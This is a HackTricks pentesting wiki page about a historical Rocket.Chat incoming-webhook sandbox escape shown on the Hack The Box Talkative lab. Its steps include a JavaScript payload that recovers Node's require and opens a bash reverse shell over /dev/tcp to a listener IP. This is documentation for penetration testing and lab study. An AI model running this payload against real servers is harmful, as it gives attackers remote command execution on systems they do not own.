rocket-chat.md (3494B)
1 --- 2 title: "Rocket.Chat" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/rocket-chat.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/rocket-chat.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Rocket.Chat 14 15 ## Historical Webhook Sandbox Escape 16 17 Rocket.Chat supports incoming and outgoing integrations with custom JavaScript. Current documentation states that these scripts run in an isolated VM, so administrative access and the ability to create an integration do **not** by themselves imply host command execution.<sup>[[1]](#references)</sup> 18 19 Older lab deployments have allowed an administrator to escape the integration-script context by recovering Node.js `require` through the `console` constructor. Historically, both incoming and outgoing integrations exposed custom-script fields, although the workflow below uses an incoming webhook. The payload was demonstrated against the Hack The Box *Talkative* environment; do not assume that it applies to a current Rocket.Chat release.<sup>[[1]](#references)[[2]](#references)</sup> 20 21 The relevant administration area is **Administration > Integrations > Incoming**, historically reachable at `/admin/integrations/incoming`: 22 23 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28266%29.png" alt="Rocket.Chat incoming integrations administration page"><figcaption></figcaption></figure> 24 25 1. Open **Administration > Integrations** and create an **Incoming WebHook**. 26 2. Configure an existing destination channel and an existing **Post as** user. 27 28 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28905%29.png" alt="Rocket.Chat incoming webhook channel and user configuration"><figcaption></figcaption></figure> 29 30 3. Enable the script and, in an authorized lab, test a payload such as: 31 32 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28572%29.png" alt="Rocket.Chat incoming webhook script editor"><figcaption></figcaption></figure> 33 34 ```javascript 35 const require = console.log.constructor("return process.mainModule.require")() 36 const { exec } = require("child_process") 37 exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") 38 ``` 39 40 4. Save the integration and copy its generated webhook URL. 41 42 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28937%29.png" alt="Generated Rocket.Chat incoming webhook URL"><figcaption></figcaption></figure> 43 44 5. Request the URL to invoke the incoming webhook and observe the configured listener. 45 46 If `require`, `process.mainModule`, or `child_process` is unavailable, the sandbox is behaving differently and this historical payload does not apply. Record the exact Rocket.Chat version and deployment configuration before drawing a conclusion. 47 48 ## References 49 50 - [1] [Rocket.Chat documentation - Integrations](https://docs.rocket.chat/docs/integrations) 51 - [2] [0xdf - HTB: Talkative, Rocket.Chat webhook execution](https://0xdf.gitlab.io/2022/08/27/htb-talkative.html#shell-in-rocketchat-container)